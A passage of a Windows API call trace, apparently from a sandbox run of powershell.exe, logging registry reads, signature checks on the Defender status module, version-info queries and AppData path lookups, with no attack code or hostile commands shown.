SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83c9a8) returned 1 [0264.832] GetSystemInfo (in: lpSystemInfo=0x1b83cda0 | out: lpSystemInfo=0x1b83cda0*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0264.833] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x1b83cca8 | out: phkResult=0x1b83cca8*=0x7d4) returned 0x0 [0264.833] RegQueryValueExW (in: hKey=0x7d4, lpValueName="__PSLockdownPolicy", lpReserved=0x0, lpType=0x1b83ccf8, lpData=0x0, lpcbData=0x1b83ccf0*=0x0 | out: lpType=0x1b83ccf8*=0x0, lpData=0x0, lpcbData=0x1b83ccf0*=0x0) returned 0x2 [0264.833] RegCloseKey (hKey=0x7d4) returned 0x0 [0264.833] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpComputerStatus.cdxml", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x58 [0264.833] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpComputerStatus.cdxml", nBufferLength=0x58, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpComputerStatus.cdxml", lpFilePart=0x0) returned 0x57 [0264.833] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83ca48) returned 1 [0264.834] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpComputerStatus.cdxml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\defender\\msft_mpcomputerstatus.cdxml"), fInfoLevelId=0x0, lpFileInformation=0x2463f10 | out: lpFileInformation=0x2463f10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbd930d4, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x7c2e180c, ftLastAccessTime.dwHighDateTime=0x1d5acde, ftLastWriteTime.dwLowDateTime=0x7c2e180c, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x37b6)) returned 1 [0264.834] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83c9f8) returned 1 [0264.835] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpComputerStatus.cdxml", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x58 [0264.835] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpComputerStatus.cdxml", nBufferLength=0x58, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpComputerStatus.cdxml", lpFilePart=0x0) returned 0x57 [0264.835] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83c9c8) returned 1 [0264.835] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpComputerStatus.cdxml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\defender\\msft_mpcomputerstatus.cdxml"), fInfoLevelId=0x0, lpFileInformation=0x1b83ccf0 | out: lpFileInformation=0x1b83ccf0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbd930d4, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x7c2e180c, ftLastAccessTime.dwHighDateTime=0x1d5acde, ftLastWriteTime.dwLowDateTime=0x7c2e180c, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x37b6)) returned 1 [0264.835] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83c978) returned 1 [0264.835] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpComputerStatus.cdxml", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x58 [0264.835] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpComputerStatus.cdxml", nBufferLength=0x58, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpComputerStatus.cdxml", lpFilePart=0x0) returned 0x57 [0264.836] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpComputerStatus.cdxml", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x58 [0264.836] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpComputerStatus.cdxml", nBufferLength=0x58, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpComputerStatus.cdxml", lpFilePart=0x0) returned 0x57 [0264.836] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83c888) returned 1 [0264.836] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpComputerStatus.cdxml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\defender\\msft_mpcomputerstatus.cdxml"), fInfoLevelId=0x0, lpFileInformation=0x1b83cbb0 | out: lpFileInformation=0x1b83cbb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbd930d4, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x7c2e180c, ftLastAccessTime.dwHighDateTime=0x1d5acde, ftLastWriteTime.dwLowDateTime=0x7c2e180c, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x37b6)) returned 1 [0264.836] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83c838) returned 1 [0264.836] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpComputerStatus.cdxml", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x58 [0264.836] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpComputerStatus.cdxml", nBufferLength=0x58, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpComputerStatus.cdxml", lpFilePart=0x0) returned 0x57 [0264.836] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83ca88) returned 1 [0264.836] CreateFileW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpComputerStatus.cdxml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\defender\\msft_mpcomputerstatus.cdxml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x7d4 [0264.837] GetFileType (hFile=0x7d4) returned 0x1 [0264.837] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83c9f8) returned 1 [0264.837] GetFileType (hFile=0x7d4) returned 0x1 [0264.837] WTGetSignatureInfo () returned 0x0 [0264.916] CertDuplicateCertificateContext (pCertContext=0x1a8e0950) returned 0x1a8e0950 [0264.916] CryptCATHandleFromStore () returned 0x81cdf0 [0264.916] WTHelperGetProvSignerFromChain () returned 0x1aa11ed0 [0264.916] WTHelperGetProvCertFromChain () returned 0x1aa10f20 [0264.917] CertDuplicateCertificateContext (pCertContext=0x1a8e0650) returned 0x1a8e0650 [0264.917] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1b83caf8 | out: phkResult=0x1b83caf8*=0x7f0) returned 0x0 [0264.918] RegQueryValueExW (in: hKey=0x7f0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1b83cb48, lpData=0x0, lpcbData=0x1b83cb40*=0x0 | out: lpType=0x1b83cb48*=0x1, lpData=0x0, lpcbData=0x1b83cb40*=0x56) returned 0x0 [0264.918] RegQueryValueExW (in: hKey=0x7f0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1b83cb48, lpData=0x2464790, lpcbData=0x1b83cb40*=0x56 | out: lpType=0x1b83cb48*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1b83cb40*=0x56) returned 0x0 [0264.918] RegCloseKey (hKey=0x7f0) returned 0x0 [0264.918] CoTaskMemAlloc (cb=0x10) returned 0x1ace73f0 [0264.918] CoTaskMemAlloc (cb=0x50) returned 0x1acc7ff0 [0264.918] WinVerifyTrust () returned 0x0 [0264.918] CoTaskMemFree (pv=0x1acc7ff0) [0264.918] CoTaskMemFree (pv=0x1ace73f0) [0264.918] CertFreeCertificateContext (pCertContext=0x1a8e0950) returned 1 [0264.919] CloseHandle (hObject=0x7d4) returned 1 [0264.919] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpComputerStatus.cdxml", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x58 [0264.919] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpComputerStatus.cdxml", nBufferLength=0x58, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpComputerStatus.cdxml", lpFilePart=0x0) returned 0x57 [0264.919] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83cd48) returned 1 [0264.919] CreateFileW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpComputerStatus.cdxml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\defender\\msft_mpcomputerstatus.cdxml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x7d4 [0264.920] GetFileType (hFile=0x7d4) returned 0x1 [0264.920] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83ccb8) returned 1 [0264.920] GetFileType (hFile=0x7d4) returned 0x1 [0264.920] SetFilePointer (in: hFile=0x7d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x1b83ccd8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x1b83ccd8*=0) returned 0x0 [0264.920] ReadFile (in: hFile=0x7d4, lpBuffer=0x24658d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b83cd58, lpOverlapped=0x0 | out: lpBuffer=0x24658d8*, lpNumberOfBytesRead=0x1b83cd58*=0x1000, lpOverlapped=0x0) returned 1 [0264.921] SetFilePointer (in: hFile=0x7d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x1b83ccd8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x1b83ccd8*=0) returned 0x1000 [0264.921] ReadFile (in: hFile=0x7d4, lpBuffer=0x24658d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b83cd58, lpOverlapped=0x0 | out: lpBuffer=0x24658d8*, lpNumberOfBytesRead=0x1b83cd58*=0x1000, lpOverlapped=0x0) returned 1 [0264.924] SetFilePointer (in: hFile=0x7d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x1b83ccd8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x1b83ccd8*=0) returned 0x2000 [0264.924] ReadFile (in: hFile=0x7d4, lpBuffer=0x24658d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b83cd58, lpOverlapped=0x0 | out: lpBuffer=0x24658d8*, lpNumberOfBytesRead=0x1b83cd58*=0x1000, lpOverlapped=0x0) returned 1 [0264.924] SetFilePointer (in: hFile=0x7d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x1b83ccd8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x1b83ccd8*=0) returned 0x3000 [0264.924] ReadFile (in: hFile=0x7d4, lpBuffer=0x24658d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b83cd58, lpOverlapped=0x0 | out: lpBuffer=0x24658d8*, lpNumberOfBytesRead=0x1b83cd58*=0x7b6, lpOverlapped=0x0) returned 1 [0264.924] SetFilePointer (in: hFile=0x7d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x1b83ccd8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x1b83ccd8*=0) returned 0x37b6 [0264.924] ReadFile (in: hFile=0x7d4, lpBuffer=0x2464fde, nNumberOfBytesToRead=0x4a, lpNumberOfBytesRead=0x1b83cd58, lpOverlapped=0x0 | out: lpBuffer=0x2464fde*, lpNumberOfBytesRead=0x1b83cd58*=0x0, lpOverlapped=0x0) returned 1 [0264.924] SetFilePointer (in: hFile=0x7d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x1b83ccd8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x1b83ccd8*=0) returned 0x37b6 [0264.924] ReadFile (in: hFile=0x7d4, lpBuffer=0x24658d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b83cd58, lpOverlapped=0x0 | out: lpBuffer=0x24658d8*, lpNumberOfBytesRead=0x1b83cd58*=0x0, lpOverlapped=0x0) returned 1 [0264.992] CoTaskMemAlloc (cb=0x20c) returned 0x1a8c6200 [0264.992] GetSystemDirectoryW (in: lpBuffer=0x1a8c6200, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0264.992] CoTaskMemFree (pv=0x1a8c6200) [0264.992] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\wldp.dll", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x1d [0264.992] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\wldp.dll", nBufferLength=0x1d, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\wldp.dll", lpFilePart=0x0) returned 0x1c [0264.992] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83ca18) returned 1 [0264.992] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\wldp.dll" (normalized: "c:\\windows\\system32\\wldp.dll"), fInfoLevelId=0x0, lpFileInformation=0x1b83cd40 | out: lpFileInformation=0x1b83cd40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xee3b6495, ftCreationTime.dwHighDateTime=0x1d5acdd, ftLastAccessTime.dwLowDateTime=0x1e219bd8, ftLastAccessTime.dwHighDateTime=0x1da9889, ftLastWriteTime.dwLowDateTime=0xee3b6495, ftLastWriteTime.dwHighDateTime=0x1d5acdd, nFileSizeHigh=0x0, nFileSizeLow=0x29678)) returned 1 [0264.993] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83c9c8) returned 1 [0264.993] GetSystemInfo (in: lpSystemInfo=0x1b83cdc0 | out: lpSystemInfo=0x1b83cdc0*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0264.993] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x1b83ccc8 | out: phkResult=0x1b83ccc8*=0x70c) returned 0x0 [0264.993] RegQueryValueExW (in: hKey=0x70c, lpValueName="__PSLockdownPolicy", lpReserved=0x0, lpType=0x1b83cd18, lpData=0x0, lpcbData=0x1b83cd10*=0x0 | out: lpType=0x1b83cd18*=0x0, lpData=0x0, lpcbData=0x1b83cd10*=0x0) returned 0x2 [0264.993] RegCloseKey (hKey=0x70c) returned 0x0 [0264.993] CloseHandle (hObject=0x7d4) returned 1 [0265.358] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe.Config", nBufferLength=0x105, lpBuffer=0x1b83b560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe.Config", lpFilePart=0x0) returned 0x40 [0265.369] CoTaskMemAlloc (cb=0x20c) returned 0x1a8c6200 [0265.369] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1a8c6200, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39 [0265.370] CoTaskMemFree (pv=0x1a8c6200) [0265.370] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3a [0265.370] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x3a, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpFilePart=0x0) returned 0x39 [0265.372] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3a [0265.372] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x3a, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpFilePart=0x0) returned 0x39 [0265.373] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83b6c8) returned 1 [0265.373] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"), fInfoLevelId=0x0, lpFileInformation=0x1b83b9f0 | out: lpFileInformation=0x1b83b9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x359c88a6, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x1387ab92, ftLastAccessTime.dwHighDateTime=0x1da9889, ftLastWriteTime.dwLowDateTime=0x359c88a6, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x6e800)) returned 1 [0265.373] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83b678) returned 1 [0265.373] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpdwHandle=0x1b83bac8 | out: lpdwHandle=0x1b83bac8) returned 0x72c [0265.382] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", dwHandle=0x0, dwLen=0x72c, lpData=0x236bad0 | out: lpData=0x236bad0) returned 1 [0265.382] VerQueryValueW (in: pBlock=0x236bad0, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x1b83ba48, puLen=0x1b83ba40 | out: lplpBuffer=0x1b83ba48*=0x236be60, puLen=0x1b83ba40) returned 1 [0265.382] VerQueryValueW (in: pBlock=0x236bad0, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\CompanyName", lplpBuffer=0x1b83b9e8, puLen=0x1b83b9e0 | out: lplpBuffer=0x1b83b9e8*=0x236bb88, puLen=0x1b83b9e0) returned 1 [0265.382] VerQueryValueW (in: pBlock=0x236bad0, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\FileDescription", lplpBuffer=0x1b83b9e8, puLen=0x1b83b9e0 | out: lplpBuffer=0x1b83b9e8*=0x236bbdc, puLen=0x1b83b9e0) returned 1 [0265.382] VerQueryValueW (in: pBlock=0x236bad0, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\FileVersion", lplpBuffer=0x1b83b9e8, puLen=0x1b83b9e0 | out: lplpBuffer=0x1b83b9e8*=0x236bc24, puLen=0x1b83b9e0) returned 1 [0265.382] VerQueryValueW (in: pBlock=0x236bad0, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\InternalName", lplpBuffer=0x1b83b9e8, puLen=0x1b83b9e0 | out: lplpBuffer=0x1b83b9e8*=0x236bc8c, puLen=0x1b83b9e0) returned 1 [0265.382] VerQueryValueW (in: pBlock=0x236bad0, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\LegalCopyright", lplpBuffer=0x1b83b9e8, puLen=0x1b83b9e0 | out: lplpBuffer=0x1b83b9e8*=0x236bcc8, puLen=0x1b83b9e0) returned 1 [0265.382] VerQueryValueW (in: pBlock=0x236bad0, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\OriginalFilename", lplpBuffer=0x1b83b9e8, puLen=0x1b83b9e0 | out: lplpBuffer=0x1b83b9e8*=0x236bd4c, puLen=0x1b83b9e0) returned 1 [0265.382] VerQueryValueW (in: pBlock=0x236bad0, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\ProductName", lplpBuffer=0x1b83b9e8, puLen=0x1b83b9e0 | out: lplpBuffer=0x1b83b9e8*=0x236bd94, puLen=0x1b83b9e0) returned 1 [0265.383] VerQueryValueW (in: pBlock=0x236bad0, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\ProductVersion", lplpBuffer=0x1b83b9e8, puLen=0x1b83b9e0 | out: lplpBuffer=0x1b83b9e8*=0x236be04, puLen=0x1b83b9e0) returned 1 [0265.383] VerQueryValueW (in: pBlock=0x236bad0, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\Comments", lplpBuffer=0x1b83b9e8, puLen=0x1b83b9e0 | out: lplpBuffer=0x1b83b9e8*=0x0, puLen=0x1b83b9e0) returned 0 [0265.383] VerQueryValueW (in: pBlock=0x236bad0, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\LegalTrademarks", lplpBuffer=0x1b83b9e8, puLen=0x1b83b9e0 | out: lplpBuffer=0x1b83b9e8*=0x0, puLen=0x1b83b9e0) returned 0 [0265.383] VerQueryValueW (in: pBlock=0x236bad0, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\PrivateBuild", lplpBuffer=0x1b83b9e8, puLen=0x1b83b9e0 | out: lplpBuffer=0x1b83b9e8*=0x0, puLen=0x1b83b9e0) returned 0 [0265.383] VerQueryValueW (in: pBlock=0x236bad0, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\SpecialBuild", lplpBuffer=0x1b83b9e8, puLen=0x1b83b9e0 | out: lplpBuffer=0x1b83b9e8*=0x0, puLen=0x1b83b9e0) returned 0 [0265.383] VerQueryValueW (in: pBlock=0x236bad0, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x1b83b998, puLen=0x1b83b990 | out: lplpBuffer=0x1b83b998*=0x236be60, puLen=0x1b83b990) returned 1 [0265.383] VerLanguageNameW (in: wLang=0x409, szLang=0x1b83b6c0, cchLang=0x100 | out: szLang="English (United States)") returned 0x17 [0265.383] VerQueryValueW (in: pBlock=0x236bad0, lpSubBlock="\\", lplpBuffer=0x1b83b9e8, puLen=0x1b83b9e0 | out: lplpBuffer=0x1b83b9e8*=0x236baf8, puLen=0x1b83b9e0) returned 1 [0265.488] CoTaskMemAlloc (cb=0x20c) returned 0x1a8c6200 [0265.488] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x1a8c6200 | out: pszPath="C:\\Users\\OqXZRaykm\\AppData\\Roaming") returned 0x0 [0265.489] CoTaskMemFree (pv=0x1a8c6200) [0265.489] GetFullPathNameW (in: lpFileName="C:\\Users\\OqXZRaykm\\AppData\\Roaming", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x23 [0265.489] GetFullPathNameW (in: lpFileName="C:\\Users\\OqXZRaykm\\AppData\\Roaming", nBufferLength=0x23, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\OqXZRaykm\\AppData\\Roaming", lpFilePart=0x0) returned 0x22 [0265.489] CoTaskMemAlloc (cb=0x20c) returned 0x1a8c6200 [0265.489] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x1a8c6200 | out: pszPath="C:\\Users\\OqXZRaykm\\AppData\\Local") returned 0x0 [0265.489] CoTaskMemFree (pv=0x1a8c6200) [0265.489] GetFullPathNameW (in: lpFileName="C:\\Users\\OqXZRaykm\\AppData\\Local", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x21 [0265.489] GetFullPathNameW (in: lpFileName="C:\\Users\\OqXZRaykm\\AppData\\Local", nBufferLength=0x21, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\OqXZRaykm\\AppData\\Local", lpFilePart=0x0) returned 0x20 [0265.490] GetCurrentProcess () returned 0xffffffffffffffff [0265.490] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1b83b908 | out: TokenHandle=0x1b83b908*=0x7ec) returned 1 [0265.491] CloseHandle (hObject=0x7ec) returned 1 [0265.491] GetCurrentProcess () returned 0xffffffffffffffff [0265.491] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1b83b908 | out: TokenHandle=0x1b83b908*=0x7ec) returned 1 [0265.492] CloseHandle (hObject=0x7ec) returned 1 [0265.499] GetCurrentProcess () returned 0xffffffffffffffff [0265.504] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1b83b748 | out: TokenHandle=0x1b83b748*=0x7ec) returned 1 [0265.505] GetFileAttributesExW (in: lpFileName="C:\\Users\\OqXZRaykm\\AppData\\Roaming\\Microsoft_Corporation\\DefaultDomain_Path_kxvtrhbolmjvgo3xagw1tq3par5ze3hu\\10.0.19041.1\\user.config" (normalized: "c:\\users\\oqxzraykm\\appdata\\roaming\\microsoft_corporation\\defaultdomain_path_kxvtrhbolmjvgo3xagw1tq3par5ze3hu\\10.0.19041.1\\user.config"), fInfoLevelId=0x0, lpFileInformation=0x1b83b7f0 | out: lpFileInformation=0x1b83b7f0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0265.505] GetFullPathNameW (in: lpFileName="C:\\Users\\OqXZRaykm\\AppData\\Roaming\\Microsoft_Corporation\\DefaultDomain_Path_kxvtrhbolmjvgo3xagw1tq3par5ze3hu\\10.0.19041.1\\user.config", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x86 [0265.506] GetFullPathNameW (in: lpFileName="C:\\Users\\OqXZRaykm\\AppData\\Roaming\\Microsoft_Corporation\\DefaultDomain_Path_kxvtrhbolmjvgo3xagw1tq3par5ze3hu\\10.0.19041.1\\user.config", nBufferLength=0x86, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\OqXZRaykm\\AppData\\Roaming\\Microsoft_Corporation\\DefaultDomain_Path_kxvtrhbolmjvgo3xagw1tq3par5ze3hu\\10.0.19041.1\\user.config", lpFilePart=0x0) returned 0x85 [0265.506] GetFileAttributesExW 